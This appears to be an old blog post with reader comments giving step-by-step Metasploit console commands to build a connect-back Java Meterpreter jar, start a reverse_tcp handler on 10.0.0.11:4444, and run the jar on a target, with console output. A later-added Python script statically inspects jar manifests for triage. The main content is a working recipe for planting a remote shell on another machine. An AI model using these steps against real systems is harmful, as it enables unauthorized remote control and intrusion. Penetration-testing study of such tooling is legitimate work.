Here are some quick notes on how to create a connect-back Java Meterpreter .jar file. The process is very straightforward: generate the .jar, set up a handler, then move the .jar to your target & execute it.
Note! Nightranger’s method to do this is currently out of date (10/17/2010).
Following mihi’s instructions, create the payload:
msf exploit(java_signed_applet) > use test/java_tester
msf exploit(java_tester) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_tester) > set LHOST 10.0.0.11
msf exploit(java_tester) > set LPORT 4444
msf exploit(java_tester) > exploit
[*] Started reverse handler on 10.0.0.11:4444
[*] Sending stage (26938 bytes) to 10.0.0.11
[*] Meterpreter session 1 opened (10.0.0.11:4444 -> 10.0.0.11:60519) at 2010-10-17 17:50:29 -0500
^C
[*] Exploit completed, but no session was created.
msf exploit(java_tester) >
[*] Meterpreter session 1 closed. Reason: Died
msf exploit(java_tester) > ls
payload.jar
Now, set up the handler:
msf exploit(java_tester) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.11
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
Copy the payload to the target & run it, and you're golden. No need to fiddle with the classpath or anything: the loader jar is self-contained.
Eventually you’ll be able to build the jar with msfpayload or by using the payload in msfconsole.
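To make "self-contained" concrete, here is a small inspection script added to these notes (not part of the original post and not Metasploit's code): it builds a constructed stand-in jar with placeholder names (example.Loader, example/config.dat, not Metasploit's real layout) and reads the manifest and entries without running anything, which is how a responder would triage an unknown .jar.

```python
import io
import zipfile


def build_sample_jar() -> bytes:
    """Constructed stand-in for a self-contained loader jar (placeholder names)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\nMain-Class: example.Loader\r\n\r\n")
        # minimal class-file header (0xCAFEBABE) so the entry looks like bytecode
        zf.writestr("example/Loader.class", b"\xca\xfe\xba\xbe" + b"\x00" * 12)
        # constructed config blob standing in for embedded connect-back settings
        zf.writestr("example/config.dat", b"LHOST=10.0.0.11\nLPORT=4444\n")
    return buf.getvalue()


def parse_manifest(text: str) -> dict:
    """Main section of a JAR manifest: 'Key: Value' lines, leading space continues."""
    attrs, last = {}, None
    for line in text.splitlines():
        if not line.strip():
            break  # blank line ends the main section
        if line.startswith(" ") and last is not None:
            attrs[last] += line[1:]
        elif ":" in line:
            key, _, value = line.partition(":")
            last = key.strip()
            attrs[last] = value.strip()
    return attrs


def inspect_jar(data: bytes) -> dict:
    """Static triage of a jar: entry point, external dependencies, signing."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        manifest = ""
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    attrs = parse_manifest(manifest)
    classes = [n for n in names if n.endswith(".class")]
    data_files = [n for n in names
                  if not n.endswith(".class") and not n.startswith("META-INF/")]
    return {
        "main_class": attrs.get("Main-Class"),
        "class_path": attrs.get("Class-Path"),
        # runnable on its own: has an entry point and declares no external jars
        "self_contained": "Main-Class" in attrs and "Class-Path" not in attrs,
        "class_count": len(classes),
        "data_entries": data_files,
        "signed": any(n.startswith("META-INF/") and n.endswith((".SF", ".RSA", ".DSA"))
                      for n in names),
    }
```

A jar that has a Main-Class, no Class-Path and no signature files can be launched directly with `java -jar`, which is exactly the property the loader relies on and the first thing worth checking on an unknown jar found on a host.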
I tried it with Win 7 & Win XP targets, with new Java and with one a year old; it never completes, just hangs at “Sending stage (749056 bytes) to 192.168.1.81”.
I can use the Adobe Cooltype exploit but the JAR one doesn’t work. I am using BackTrack 4 in VMware Workstation.
Make sure to use the java/meterpreter/reverse_tcp payload, and not windows/meterpreter/reverse_tcp.
Note: test modules need to be loaded in now:
msf exploit(psexec) > loadpath /home/jcran/framework/test/modules